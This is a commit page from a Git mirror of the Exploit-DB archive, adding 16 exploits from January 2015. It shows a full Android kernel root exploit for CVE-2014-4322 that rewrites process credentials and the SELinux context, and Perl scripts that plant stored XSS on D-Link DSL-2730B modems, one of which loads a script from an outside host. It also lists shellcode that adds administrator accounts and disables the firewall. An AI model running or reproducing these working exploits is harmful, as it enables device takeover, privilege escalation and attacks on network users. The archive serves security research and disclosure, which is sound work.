bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Update: 2015-01-19

Browse source 
16 new exploits
This commit is contained in:
Offensive Security 2015-01-19 08:35:52 +00:00
parent 7bb980404f
commit 77291f0ca3
17 changed files with 2130 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

16
files.csv
View file

@ -32170,6 +32170,7 @@ id,file,description,date,author,platform,type,port
35708,platforms/php/webapps/35708.txt,"PHPDug 2.0 Multiple Cross Site Scripting Vulnerabilities",2011-05-05,"High-Tech Bridge SA",php,webapps,0
35709,platforms/php/webapps/35709.txt,"e107 0.7.25 'news.php' SQL Injection Vulnerability",2011-05-07,KedAns-Dz,php,webapps,0
35710,platforms/php/webapps/35710.py,"AdaptCMS 3.0.3 - Multiple Vulnerabilities",2015-01-06,LiquidWorm,php,webapps,80
35711,platforms/android/local/35711.c,"Nexus 5 Android 5.0 - Local Root Exploit",2015-01-06,retme,android,local,0
35712,platforms/windows/local/35712.rb,"BulletProof FTP Client BPS Buffer Overflow",2015-01-06,metasploit,windows,local,0
35713,platforms/php/webapps/35713.txt,"FestOS 2.3c 'upload.php' Arbitrary File Upload Vulnerability",2011-05-08,KedAns-Dz,php,webapps,0
35714,platforms/windows/remote/35714.pl,"BlueVoda Website Builder 11 '.bvp' File Stack-Based Buffer Overflow Vulnerability",2011-05-09,KedAns-Dz,windows,remote,0
@ -32191,6 +32192,7 @@ id,file,description,date,author,platform,type,port
35730,platforms/php/webapps/35730.txt,"WordPress Shopping Cart 3.0.4 - Unrestricted File Upload",2015-01-08,"Kacper Szurek",php,webapps,80
35731,platforms/php/remote/35731.rb,"Pandora v3.1 - Auth Bypass and Arbitrary File Upload Vulnerability",2015-01-08,metasploit,php,remote,80
35732,platforms/multiple/local/35732.py,"Ntpdc 4.2.6p3 - Local Buffer Overflow",2015-01-08,drone,multiple,local,0
35733,platforms/php/webapps/35733.txt,"vBulletin MicroCART 1.1.4 - Arbitrary File(s) Deletion, SQL Injection & XSS",2015-01-09,Dave,php,webapps,80
35734,platforms/php/webapps/35734.txt,"ZAPms 1.22 'nick' Parameter SQL Injection Vulnerability",2011-05-09,KedAns-Dz,php,webapps,0
35735,platforms/multiple/remote/35735.txt,"Apache Struts 2.x XWork 's:submit' HTML Tag Cross Site Scripting Vulnerability",2011-05-10,"Dr. Marian Ventuneac",multiple,remote,0
35736,platforms/php/webapps/35736.txt,"poMMo Aardvark PR16.1 Multiple Cross Site Scripting Vulnerabilities",2011-05-10,"High-Tech Bridge SA",php,webapps,0
@ -32198,13 +32200,17 @@ id,file,description,date,author,platform,type,port
35738,platforms/linux/dos/35738.php,"Apache 1.4/2.2.x APR 'apr_fnmatch()' Denial of Service Vulnerability",2011-05-12,"Maksymilian Arciemowicz",linux,dos,0
35739,platforms/php/webapps/35739.txt,"Argyle Social Multiple Cross Site Scripting Vulnerabilities",2011-05-12,"High-Tech Bridge SA",php,webapps,0
35740,platforms/windows/remote/35740.txt,"Microsoft .NET Framework JIT Compiler Optimization NULL String Remote Code Execution Vulnerability",2011-03-04,"Brian Mancini",windows,remote,0
35741,platforms/windows/local/35741.pl,"Palringo 2.8.1 - Stack Buffer Overflow (PoC)",2015-01-10,Mr.ALmfL9,windows,local,0
35742,platforms/osx/local/35742.c,"OS X 10.9.x - sysmond XPC Privilege Escalation",2015-01-10,"Google Security Research",osx,local,0
35743,platforms/multiple/webapps/35743.txt,"Flash Tag Cloud And MT-Cumulus Plugin 'tagcloud' Parameter Cross-Site Scripting Vulnerability",2011-05-13,MustLive,multiple,webapps,0
35744,platforms/windows/remote/35744.pl,"AVS Ringtone Maker 1.6.1 '.au' File Remote Buffer Overflow Vulnerability",2011-05-16,KedAns-Dz,windows,remote,0
35745,platforms/php/webapps/35745.txt,"Joomla! 'com_cbcontact' Component 'contact_id' Parameter SQL Injection Vulnerability",2011-05-16,KedAns-Dz,php,webapps,0
35746,platforms/linux/local/35746.sh,"RedStar 3.0 Desktop - Privilege Escalation (Enable sudo)",2015-01-11,"prdelka & ?sfan55",linux,local,0
35747,platforms/hardware/webapps/35747.pl,"D-Link DSL-2730B Modem - XSS Injection Stored Exploit Wlsecrefresh.wl & Wlsecurity.wl",2015-01-11,"Mauricio Correa",hardware,webapps,0
35748,platforms/linux/local/35748.txt,"RedStar 2.0 Desktop - Privilege Escalation (World-writeable rc.sysinit)",2015-01-11,prdelka,linux,local,0
35749,platforms/linux/local/35749.txt,"RedStar 3.0 Desktop - Privilege Escalation (Software Manager - swmng.app)",2015-01-11,RichardG,linux,local,0
35750,platforms/hardware/webapps/35750.pl,"D-Link DSL-2730B Modem - XSS Injection Stored Exploit DnsProxy.cmd",2015-01-11,"Mauricio Correa",hardware,webapps,0
35751,platforms/hardware/webapps/35751.pl,"D-Link DSL-2730B Modem - XSS Injection Stored Exploit Lancfg2get.cgi",2015-01-11,"Mauricio Correa",hardware,webapps,0
35752,platforms/php/webapps/35752.txt,"Mambo 'com_docman' 1.3.0 Component Multiple SQL Injection Vulnerabilities",2011-05-16,KedAns-Dz,php,webapps,0
35753,platforms/multiple/dos/35753.pl,"Novell eDirectory 8.8 and Netware LDAP-SSL Daemon Denial Of Service Vulnerability",2011-05-16,Knud,multiple,dos,0
35754,platforms/php/webapps/35754.txt,"allocPSA 1.7.4 'login/login.php' Cross Site Scripting Vulnerability",2011-05-16,"AutoSec Tools",php,webapps,0
@ -32244,6 +32250,8 @@ id,file,description,date,author,platform,type,port
35790,platforms/multiple/remote/35790.py,"Lumension Security Lumension Device Control 4.x Memory Corruption Vulnerability",2011-05-24,"Andy Davis",multiple,remote,0
35791,platforms/php/webapps/35791.txt,"Ajax Chat 1.0 'ajax-chat.php' Cross Site Scripting Vulnerability",2011-05-24,"High-Tech Bridge SA",php,webapps,0
35792,platforms/multiple/remote/35792.txt,"Gadu-Gadu Instant Messenger 6.0 File Transfer Cross Site Scripting Vulnerability",2011-05-24,"Kacper Szczesniak",multiple,remote,0
35793,platforms/win32/shellcode/35793.txt,"Obfuscated Shellcode Windows x86 - [1218 Bytes] Add Administrator User/Pass ALI/ALI & Add ALI To RDP Group & Enable RDP From Registry & STOP Firewall & Auto Start Terminal Service",2015-01-13,"Ali Razmjoo",win32,shellcode,0
35794,platforms/win64/shellcode/35794.txt,"Obfuscated Shellcode Windows x64 - [1218 Bytes] Add Administrator User/Pass ALI/ALI & Add ALI To RDP Group & Enable RDP From Registry & STOP Firewall & Auto Start Terminal Service",2015-01-13,"Ali Razmjoo",win64,shellcode,0
35796,platforms/php/webapps/35796.txt,"MidiCMS Website Builder Local File Include and Arbitrary File Upload Vulnerabilities",2011-05-25,KedAns-Dz,php,webapps,0
35797,platforms/php/webapps/35797.txt,"Joomla! 'com_shop' Component SQL Injection Vulnerability",2011-05-25,"ThunDEr HeaD",php,webapps,0
35798,platforms/php/webapps/35798.txt,"Kryn.cms 0.9 '_kurl' Parameter Cross Site Scripting Vulnerability",2011-05-25,"AutoSec Tools",php,webapps,0
@ -32252,9 +32260,17 @@ id,file,description,date,author,platform,type,port
35801,platforms/linux/remote/35801.txt,"Asterisk 1.8.4 1 SIP 'REGISTER' Request User Enumeration Weakness",2011-05-26,"Francesco Tornieri",linux,remote,0
35802,platforms/cgi/webapps/35802.txt,"Blackboard Learn 8.0 'keywordraw' Parameter Cross Site Scripting Vulnerability",2011-05-25,"Matt Jezorek",cgi,webapps,0
35803,platforms/php/webapps/35803.txt,"Cotonti 0.9.2 Multiple SQL Injection Vulnerabilities",2011-05-30,KedAns-Dz,php,webapps,0
35804,platforms/windows/dos/35804.txt,"NetVault: SmartDisk 1.2 'libnvbasics.dll' Remote Denial of Service Vulnerability",2011-05-28,"Luigi Auriemma",windows,dos,0
35805,platforms/multiple/remote/35805.txt,"Gadu-Gadu 10.5 Remote Code Execution Vulnerability",2011-05-28,"Kacper Szczesniak",multiple,remote,0
35806,platforms/windows/remote/35806.c,"Poison Ivy 2.3.2 Unspecified Remote Buffer Overflow Vulnerability",2011-05-27,"Kevin R.V",windows,remote,0
35807,platforms/asp/webapps/35807.txt,"Kentico CMS 5.5R2.23 'userContextMenu_parameter' Parameter Cross Site Scripting Vulnerability",2011-05-31,LiquidWorm,asp,webapps,0
35808,platforms/php/webapps/35808.txt,"Serendipity Freetag-plugin 3.21 'index.php' Cross Site Scripting Vulnerability",2011-05-31,"Stefan Schurtz",php,webapps,0
35809,platforms/windows/remote/35809.c,"Microsoft Windows Live Messenger 14 'dwmapi.dll' DLL Loading Arbitrary Code Execution Vulnerability",2011-05-31,Kalashinkov3,windows,remote,0
35810,platforms/linux/remote/35810.txt,"libxmlInvalid 2.7.x XPath Multiple Memory Corruption Vulnerabilities",2011-05-31,"Chris Evans",linux,remote,0
35814,platforms/php/webapps/35814.txt,"TEDE Simplificado v1.01/vS2.04 Multiple SQL Injection Vulnerabilities",2011-06-01,KnocKout,php,webapps,0
35815,platforms/php/webapps/35815.pl,"PikaCMS Multiple Local File Disclosure Vulnerabilities",2011-06-01,KnocKout,php,webapps,0
35816,platforms/php/webapps/35816.txt,"ARSC Really Simple Chat 3.3-rc2 Cross Site Scripting and Multiple SQL Injection Vulnerabilities",2011-06-01,"High-Tech Bridge SA",php,webapps,0
35817,platforms/hardware/remote/35817.txt,"NetGear WNDAP350 Wireless Access Point Multiple Information Disclosure Vulnerabilities",2011-06-01,"Juerd Waalboer",hardware,remote,0
35818,platforms/multiple/remote/35818.txt,"Nagios 3.2.3 'expand' Parameter Cross Site Scripting Vulnerability",2011-06-01,"Stefan Schurtz",multiple,remote,0
35819,platforms/php/webapps/35819.txt,"Ushahidi 2.0.1 'range' Parameter SQL Injection Vulnerability",2011-06-02,"Gjoko Krstic",php,webapps,0
35820,platforms/linux/dos/35820.c,"Linux Kernel 2.6.x KSM Local Denial of Service Vulnerability",2011-06-02,"Andrea Righi",linux,dos,0

Can't render this file because it is too large.

552
platforms/android/local/35711.c Executable file
View file

@ -0,0 +1,552 @@
/*
* CVE-2014-4322 exploit for Nexus Android 5.0
*
* author: retme retme7@gmail.com
* website: retme.net
*
* The exploit must be excuted as system privilege and specific SELinux context.
* If exploit successed,you will gain root privilege and "kernel" SELinux context
*
* bug info:
* https://www.codeaurora.org/projects/security-advisories/memory-corruption-qseecom-driver-cve-2014-4322
*
* how to build:
*
create an Android.mk as follow:
include $(CLEAR_VARS)
include $(CLEAR_VARS)
LOCAL_SRC_FILES:= ./msm.c \
./shellcode.S
LOCAL_MODULE:= exploit
#LOCAL_C_INCLUDES += $(common_includes)
LOCAL_CPPFLAGS += -DDEBUG
LOCAL_CFLAGS += -DDEBUG
LOCAL_LDLIBS += -L$(SYSROOT)/usr/lib -llog
include $(BUILD_EXECUTABLE)
include $(BUILD_EXECUTABLE)
create Application.mk as follow:
APP_ABI := armeabi
APP_PLATFORM := android-8
APP_PIE:= true
use ndk-build to build the project
usage:
run exploit as system privilege,with SELinux context such as "keystore","vold","drmserver","mediaserver","surfaceflinger"
*
* If exploit successed,you will gain root privilege and "kernel" SELinux context
*
*
* */
//=========================================msm.c=============================================
#include <string.h>
#include <jni.h>
#include <android/log.h>
#include <pthread.h>
#include <sys/prctl.h>
#include <sys/ioctl.h>
#include <stdio.h>
#include <stdlib.h>
#include <asm/ptrace.h>
#include <asm/user.h>
#include <asm/ptrace.h>
#include <sys/wait.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <dlfcn.h>
#include <dirent.h>
#include <unistd.h>
#include <linux/elf.h>
#include <linux/reboot.h>
#include <errno.h>
#include <dlfcn.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <errno.h>
#include <dirent.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/mount.h>
#include <linux/ptrace.h>
#include <linux/prctl.h>
#include <sys/system_properties.h>
#include <errno.h>
#include <termios.h>
#include <sys/syscall.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netinet/in.h>
#include <errno.h>
#include <linux/ion.h>
#include "../kernel.h"
#include "qseecom.h"
//4.4.2 CFW(for debug)
//#define PTMX_FOPS 0xc1334e00
//fnPrintk printk = 0xc0a0113c;
//Nexus Android 5.0 OFW
#define PTMX_DEVICE "/dev/ptmx"
#define PTMX_FOPS 0xc1236cd8
fnPrintk printk = 0xc0a21e78;
int MyCommitCred(int ruid, int rgid, signed int a3, int isSelinux);
int kmemcmp(char *a1, char *a2, int len)
{
int v3; // r3@2
int v4; // r4@3
int v5; // r5@3
int result; // r0@4
if ( len )
{
v3 = 0;
while ( 1 )
{
v4 = a1[v3];
v5 = a2[v3];
if ( v4 != v5 )
break;
if ( a1[v3] )
{
++v3;
if ( len != v3 )
continue;
}
goto LABEL_7;
}
result = v4 - v5;
}
else
{
LABEL_7:
result = 0;
}
return result;
}
int g_pid = 0;
int g_tgid = 0;
int open_ion(){
int fd = open("/dev/ion",O_RDONLY);
if (fd<0){
perror("open");
}
printf("ion fd %d\n",fd);
return fd;
}
// http://lwn.net/Articles/480055/
/*
* struct ion_allocation_data {
size_t len;
size_t align;
unsigned int heap_mask;
unsigned int flags;
struct ion_handle *handle;
};
*
*
* */
#define ION_FLAG_SECURE (1<<31)
int alloc_ion_memory(int client_fd,int size,struct ion_handle** pphandle){
int ret = -1;
struct ion_allocation_data data;
// ION_FLAG_CACHED
data.len = size;
data.align = size;
data.flags = ION_HEAP_TYPE_CARVEOUT ;
//data.heap_mask = ION_HEAP_TYPE_CARVEOUT;
//data.handle = handle;
ret = ioctl(client_fd, ION_IOC_ALLOC, &data);
if (ret<0){
perror("ION_IOC_ALLOC");
}
*pphandle = data.handle;
return ret;
}
/*
struct ion_fd_data {
struct ion_handle *handle;
int fd;
}
*/
int share_ion_memory(int client_fd,struct ion_handle* handle){
struct ion_fd_data data;
data.handle = handle;
data.fd = -1;
int ret = ioctl(client_fd, ION_IOC_SHARE, &data);
return data.fd;
}
int obtain_dma_buf_fd(int size){
int fd_device = open_ion();
int dmf_fd = -1;
struct ion_handle* handle;
int ret = alloc_ion_memory(fd_device,size,&handle);
if (ret<0){
perror("alloc_ion_memory");
}
dmf_fd = share_ion_memory(fd_device,handle);
if (dmf_fd<0){
perror("share_ion_memory");
}
return dmf_fd;
}
void* fd_to_mmap(int fd,int size){
void* seg_addr = mmap(0,
size ,
PROT_READ | PROT_WRITE,
MAP_SHARED,
fd,
0);
if(seg_addr == MAP_FAILED){
perror("fd_to_map");
}
return seg_addr;
}
//c0a0113c T printk
void sayhello(){
fnPrintk printk = 0xc0a0113c;
printk("hell0 shellocde");
return;
}
void shell_code2();
static int
run_obtain_root_privilege()
{
int fd;
int ret;
fd = open(PTMX_DEVICE, O_WRONLY);
if(fd<=0){perror("ptmx");return -1;}
ret = fsync(fd);
close(fd);
return ret;
}
int main(int argc, char *argv[]){
printf("mypid %d\n",getpid());
int ret = -1;
int fd = open("/dev/qseecom", 0);
if (fd<0){
perror("open");
exit(-1);
}
void* abuseBuff = malloc(400);
memset(abuseBuff,0,400);
int* intArr = (int*)abuseBuff;
int j = 0;
for(j=0;j<24;j++){
intArr[j] = 0x1;
}
struct qseecom_send_modfd_cmd_req ioctlBuff;
prctl(PR_SET_NAME, "GodFather", 0, 0, 0);
// if(0==fork()){
g_pid = getpid();
g_tgid = g_pid;
prctl(PR_SET_NAME, "ihoo.darkytools", 0, 0, 0);
//QSEECOM_IOCTL_SET_MEM_PARAM_REQ
struct qseecom_set_sb_mem_param_req req;
req.ifd_data_fd = obtain_dma_buf_fd(8192);
req.virt_sb_base = abuseBuff;
req.sb_len = 8192;
ret = ioctl(fd, QSEECOM_IOCTL_SET_MEM_PARAM_REQ, &req);
printf("QSEECOM_IOCTL_SET_MEM_PARAM_REQ return 0x%x \n",ret);
ioctlBuff.cmd_req_buf = abuseBuff;
ioctlBuff.cmd_req_len = 400;
ioctlBuff.resp_buf = abuseBuff;
ioctlBuff.resp_len = 400;
int i = 0;
for (i = 0;i<4;i++){
ioctlBuff.ifd_data[i].fd = 0;
ioctlBuff.ifd_data[i].cmd_buf_offset =0;
}
ioctlBuff.ifd_data[0].fd = req.ifd_data_fd;
ioctlBuff.ifd_data[0].cmd_buf_offset = 0;//(int)(0xc03f0ab4 + 8) - (int)abuseBuff;
printf("QSEECOM_IOCTL_SEND_CMD_REQ");
ret = ioctl(fd, QSEECOM_IOCTL_SEND_MODFD_CMD_REQ, &ioctlBuff);
printf("return %p %p\n",intArr[0],intArr[1]);
perror("QSEECOM_IOCTL_SEND_CMD_REQ end\n");
printf("ioctl return 0x%x \n",ret);
//*(int*)intArr[0] = 0x0;
void* addr = mmap(intArr[0],4096,PROT_READ|PROT_WRITE|PROT_EXEC,MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS,-1,0);
printf("mmap return %p \n",addr);
*(int*)addr = 0xE3500000;
*((int*)((int)addr+4)) = 0xe1a0f00e;
memcpy(addr,shell_code2,400);
int* arr = (int*)addr;
for(i=0;i<10;i++){
if(arr[i] == 0xeeeeeeee)
arr[i] = (int)MyCommitCred;
printf("%p\n",arr[i]);
}
//c1334e00 b ptmx_fops
ioctlBuff.ifd_data[0].cmd_buf_offset = (int)(PTMX_FOPS + 14*4) - (int)abuseBuff;
printf("QSEECOM_IOCTL_SEND_CMD_REQ");
ret = ioctl(fd, QSEECOM_IOCTL_SEND_MODFD_CMD_REQ, &ioctlBuff);
printf("return %p %p\n",intArr[0],intArr[1]);
perror("QSEECOM_IOCTL_SEND_CMD_REQ end\n");
printf("ioctl return 0x%x \n",ret);
run_obtain_root_privilege();
char * argv1[]={"sh",(char *)0};
int result = execv("/system/bin/sh", argv1);
if(result){
perror("execv");
}
return 0;
}
int MyCommitCred(int ruid, int rgid, signed int a3, int isSelinux)
{
int v38; // [sp+0h] [bp-60h]@1
int addrBase;
char szName[16] = "ihoo.darkytools";
int offset;
mycred *my_cred;
mycred *my_real_cred;
struct task_security_struct * tsec;
int ret = -1;
int searchLenth;
isSelinux = 1;
//return 0;
addrBase = *(int*)(((int)(&v38) & 0xFFFFE000) + 0xC);
//return addrBase;
if ( addrBase > 0xBFFFFFFF )
{
offset = 0;
while ( 1 )
{
addrBase += 4;
if ( !kmemcmp(addrBase, szName, 16) )
break;
++offset;
if ( offset == 0x600 )
{
return 18;
}
}
}
else
return 17;
my_cred = *(int*)(addrBase -8);
my_real_cred = *(int*)(addrBase -8 - 4);
searchLenth = 0;
while(searchLenth<0x20){
if(!my_cred || !my_real_cred
|| my_cred<0xBFFFFFFF || my_real_cred<0xBFFFFFFF
){
//2.6?
addrBase-=4;
my_cred = *(int*)(addrBase-8 );
my_real_cred = *(int*)(addrBase -8-4);
}
else
break;
searchLenth++;
}
if(searchLenth == 0x20)
return 0X20;
// fuck!! where is my cred???
my_cred->uid = 0;
my_cred->gid = 0;
my_cred->suid = 0;
my_cred->sgid = 0;
my_cred->egid = 0;
my_cred->euid = 0;
my_cred->fsgid = 0;
my_cred->fsuid = 0;
my_cred->securebits=0;
my_cred->cap_bset.cap[0] = -1;
my_cred->cap_bset.cap[1] = -1;
my_cred->cap_inheritable.cap[0] = -1;
my_cred->cap_inheritable.cap[1] = -1;
my_cred->cap_permitted.cap[0] = -1;
my_cred->cap_permitted.cap[1] = -1;
my_cred->cap_effective.cap[0] = -1;
my_cred->cap_effective.cap[1] = -1;
my_real_cred->uid = 0;
my_real_cred->gid = 0;
my_real_cred->suid = 0;
my_real_cred->sgid = 0;
my_real_cred->egid = 0;
my_real_cred->euid = 0;
my_real_cred->fsgid = 0;
my_real_cred->fsuid = 0;
my_real_cred->securebits=0;
my_real_cred->cap_bset.cap[0] = -1;
my_real_cred->cap_bset.cap[1] = -1;
my_real_cred->cap_inheritable.cap[0] = -1;
my_real_cred->cap_inheritable.cap[1] = -1;
my_real_cred->cap_permitted.cap[0] = -1;
my_real_cred->cap_permitted.cap[1] = -1;
my_real_cred->cap_effective.cap[0] = -1;
my_real_cred->cap_effective.cap[1] = -1;
if(isSelinux){
tsec = my_cred->security;
if(tsec && tsec > 0xBFFFFFFF){
tsec->sid = 1;
tsec->exec_sid = 1;
ret = 15;
}
else {
tsec = (struct task_security_struct*)(*(int*)(0x10 + (int)&my_cred->security));
if(tsec && tsec > 0xBFFFFFFF){
tsec->sid = 1;
tsec->exec_sid = 1;
ret = 15;
}
}
tsec = my_real_cred->security;
if(tsec && tsec > 0xBFFFFFFF){
tsec->sid = 1;
tsec->exec_sid = 1;
ret = 15;
}else {
tsec = (struct task_security_struct*)(*(int*)(0x10 + (int)&my_real_cred->security));
if(tsec && tsec > 0xBFFFFFFF){
tsec->sid = 1;
tsec->exec_sid = 1;
ret = 15;
}
}
}
else{
ret = 16;
}
printk("return %d",ret);
return ret;
}
//=========================================msm.c end=============================================
//=========================================shellcode.S start=============================================
#define __ASSEMBLY__
#include <linux/linkage.h>
.extern sayhello
ENTRY(shell_code2)
ldr r0, [pc , #4]
STMFD SP!, {R0}
LDMFD SP!, {PC}
.byte 0xee, 0xee, 0xee, 0xee
//=========================================shellcode.S end=============================================

10
platforms/hardware/remote/35817.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/48085/info
NetGear WNDAP350 wireless access point is prone to multiple remote information-disclosure issues because it fails to restrict access to sensitive information.
A remote attacker can exploit these issues to obtain sensitive information that can aid in launching further attacks.
WNDAP350 with firmware 2.0.1 and 2.0.9 are vulnerable; other firmware versions may also be affected.
http://www.example.com/downloadFile.php
http://www.example.com/BackupConfig.php

137
platforms/hardware/webapps/35747.pl Executable file
View file

@ -0,0 +1,137 @@
# Exploit Title: D-Link DSL-2730B Modem wlsecrefresh.wl & wlsecurity.wl Exploit XSS Injection Stored
# Date: 11-01-2015
# Exploit Author: Mauricio Correa
# Vendor Homepage: www.dlink.com
# Hardware version: C1
# Version: GE 1.01
# Tested on: Windows 8 and Linux
#!/usr/bin/perl
#
# Date dd-mm-aaaa: 11-11-2014
# Exploit for D-Link DSL-2730B
# Cross Site Scripting (XSS Injection) Stored in wlsecrefresh.wl
# Developed by Mauricio Corrêa
# XLabs Information Security
# WebSite: www.xlabs.com.br
# More informations: www.xlabs.com.br/blog/?p=339
#
# CAUTION!
# This exploit disables some features of the modem,
# forcing the administrator of the device, accessing the page to reconfigure the modem again,
# occurring script execution in the browser of internal network users.
#
# Use with caution!
# Use at your own risk!
#
use strict;
use warnings;
use diagnostics;
use LWP::UserAgent;
use HTTP::Request;
use URI::Escape;
my $ip = $ARGV[0];
my $user = $ARGV[1];
my $pass = $ARGV[2];
my $opt = $ARGV[3];
$ip = $1 if($ip=~/(.*)\/$/);
if (@ARGV != 4){
print "\n";
print "XLabs Information Security www.xlabs.com.br\n";
print "Exploit for POC D-Link DSL-2730B Stored XSS Injection in wlsecrefresh.wl\n";
print "Developed by Mauricio Correa\n";
print "Contact: mauricio\@xlabs.com.br\n";
print "Usage: perl $0 http:\/\/host_ip\/ user pass option\n";
print "\n";
print "Options: 1 - Parameter: wlAuthMode \n";
print " 2 - Parameter: wl_wsc_reg \n ";
print " 3 - Parameter: wl_wsc_mode \n";
print " 4 - Parameter: wlWpaPsk (Execute on click to exibe Wireless password) \n";
}else{
print "XLabs Information Security www.xlabs.com.br\n";
print "Exploit for POC D-Link DSL-2730B Stored XSS Injection in wlsecrefresh.wl\n";
print "Developed by Mauricio Correa\n";
print "Contact: mauricio\@xlabs.com.br\n";
print "[+] Exploring $ip\/ ...\n";
my $payload = "%27;alert(%27\/\/XLabsSec%27);\/\/";
my $ua = new LWP::UserAgent;
my $hdrs = new HTTP::Headers( Accept => 'text/plain', UserAgent => "XLabs Security Exploit Browser/1.0" );
$hdrs->authorization_basic($user, $pass);
chomp($ip);
print "[+] Preparing...\n";
my $url_and_payload = "";
if($opt == 1){
$url_and_payload = "$ip/wlsecrefresh.wl?wl_wsc_mode=disabled&wl_wsc_reg=disabled&wlAuth=0&wlAuthMode=1$payload".
"&wlKeyBit=0&wlPreauth=0&wlSsidIdx=0&wlSyncNvram=1&wlWep=disabled&wlWpa=&wsc_config_state=0";
}elsif($opt == 2){
$url_and_payload = "$ip/wlsecrefresh.wl?wl_wsc_mode=disabled&wl_wsc_reg=disabled$payload&wlAuth=0&wlAuthMode=997354".
"&wlKeyBit=0&wlPreauth=0&wlSsidIdx=0&wlSyncNvram=1&wlWep=disabled&wlWpa=&wsc_config_state=0";
}elsif($opt == 3){
$payload = "%27;alert(%27\/\/XLabsSec%27);\/\/";
$url_and_payload = "$ip/wlsecrefresh.wl?wl_wsc_mode=disabled$payload&wl_wsc_reg=disabled&wlAuth=0&wlAuthMode=997354".
"&wlKeyBit=0&wlPreauth=0&wlSsidIdx=0&wlSyncNvram=1&wlWep=disabled&wlWpa=&wsc_config_state=0";
}elsif($opt == 4){
$payload = "GameOver%3Cscript%20src%3D%22http%3A%2f%2fxlabs.com.br%2fxssi.js%22%3E%3C%2fscript%3E";
$url_and_payload = "$ip/wlsecurity.wl?wl_wsc_mode=enabled&wl_wsc_reg=disabled&wsc_config_state=0&wlAuthMode=psk%20psk2&wlAuth=0&".
"wlWpaPsk=$payload&wlWpaGtkRekey=0&wlNetReauth=36000&wlWep=disabled&wlWpa=aes&wlKeyBit=0&wlPreauth=0&".
"wlSsidIdx=0&wlSyncNvram=1";
}else{
print "[-] Chose one option!\n";
exit;
}
my $req = new HTTP::Request("GET",$url_and_payload,$hdrs);
print "[+] Prepared!\n";
print "[+] Requesting...\n";
my $resp = $ua->request($req);
if ($resp->is_success){
print "[+] Successfully Requested!\n";
my $resposta = $resp->as_string;
print "[+] Checking for properly explored...\n";
my $url = "$ip/wlsecurity.html";
$req = new HTTP::Request("GET",$url,$hdrs);
print "[+] Checking that was explored...\n";
my $resp2 = $ua->request($req);
if ($resp2->is_success){
my $result = $resp2->as_string;
if($opt == 4){
$payload = "%27GameOver%3Cscript%20src%3D%5C%22http%3A%2f%2fxlabs.com.br%2fxssi.js%5C%22%3E%3C%2fscript%3E%27";
}
if(index($result, uri_unescape($payload)) != -1){
print "[+] Successfully Exploited!";
}else{
print "[-] Not Exploited!";
}
}
}else {
print "[-] Ops!\n";
print $resp->message;
}
}

138
platforms/hardware/webapps/35750.pl Executable file
View file

@ -0,0 +1,138 @@
# Exploit Title: D-Link DSL-2730B Modem dnsProxy.cmd Exploit XSS Injection Stored
# Date: 11-01-2015
# Exploit Author: Mauricio Correa
# Vendor Homepage: www.dlink.com
# Hardware version: C1
# Version: GE 1.01
# Tested on: Windows 8 and Linux
#!/usr/bin/perl
#
# Date dd-mm-aaaa: 11-11-2014
# Exploit for D-Link DSL-2730B
# Cross Site Scripting (XSS Injection) Stored in dnsProxy.cmd
# Developed by Mauricio Corrêa
# XLabs Information Security
# WebSite: www.xlabs.com.br
# More informations: www.xlabs.com.br/blog/?p=339
#
# CAUTION!
# This exploit enable some features of the modem,
# forcing the administrator of the device, accessing the page to reconfigure the modem again,
# occurring script execution in the browser of internal network users.
#
# Use with caution!
# Use at your own risk!
#
use strict;
use warnings;
use diagnostics;
use LWP::UserAgent;
use HTTP::Request;
use URI::Escape;
my $ip = $ARGV[0];
my $user = $ARGV[1];
my $pass = $ARGV[2];
$ip = $1 if($ip=~/(.*)\/$/);
if (@ARGV != 3){
print "\n";
print "XLabs Information Security www.xlabs.com.br\n";
print "Exploit for POC D-Link DSL-2730B Stored XSS Injection in dnsProxy.cmd\n";
print "Developed by Mauricio Correa\n";
print "Contact: mauricio\@xlabs.com.br\n";
print "Usage: perl $0 http:\/\/host_ip\/ user pass\n";
}else{
print "XLabs Information Security www.xlabs.com.br\n";
print "Exploit for POC D-Link DSL-2730B Stored XSS Injection in dnsProxy.cmd\n";
print "Developed by Mauricio Correa\n";
print "Contact: mauricio\@xlabs.com.br\n";
print "[+] Exploring $ip\/ ...\n";
my $payload = "%27;alert(%27XLabsSec%27);\/\/";
my $ua = new LWP::UserAgent;
my $hdrs = new HTTP::Headers( Accept => 'text/plain', UserAgent => "XLabs Security Exploit Browser/1.0" );
$hdrs->authorization_basic($user, $pass);
chomp($ip);
print "[+] Preparing...\n";
my $url = "$ip/dnsProxy.cmd?enblDproxy=1&hostname=Broadcom&domainname=A";
my $req = new HTTP::Request("GET",$url,$hdrs);
print "[+] Prepared!\n";
print "[+] Requesting...\n";
my $resp = $ua->request($req);
if ($resp->is_success){
print "[+] Successfully Requested!\n";
my $resposta = $resp->as_string;
print "[+] Obtain session key...\n";
my $token = "";
if($resposta =~ /sessionKey=(.*)\';/){
$token = $1;
print "[+] Session key found: $token\n";
}else{
print "[-] Session key not found!\n";
exit;
}
print "[+] Preparing exploit...\n";
my $url_and_xpl = "$ip/dnsProxy.cmd?enblDproxy=1&hostname=Broadcom&domainname=XSS$payload&sessionKey=$token";
$req = new HTTP::Request("GET",$url_and_xpl,$hdrs);
print "[+] Prepared!\n";
print "[+] Exploiting...\n";
my $resp2 = $ua->request($req);
if ($resp2->is_success){
my $resultado = $resp2->as_string;
if(index($resultado, uri_unescape($payload)) != -1){
print "[+] Successfully Exploited!";
}else{
print "[-] Not Exploited!";
}
}
}else {
print "[-] Ops!\n";
print $resp->message;
}
}

115
platforms/hardware/webapps/35751.pl Executable file
View file

@ -0,0 +1,115 @@
# Exploit Title: D-Link DSL-2730B Modem lancfg2get.cgi Exploit XSS Injection Stored
# Date: 11-01-2015
# Exploit Author: Mauricio Correa
# Vendor Homepage: www.dlink.com
# Hardware version: C1
# Version: GE 1.01
# Tested on: Windows 8 and Linux
#!/usr/bin/perl
#
# Date dd-mm-aaaa: 11-11-2014
# Exploit for D-Link DSL-2730B
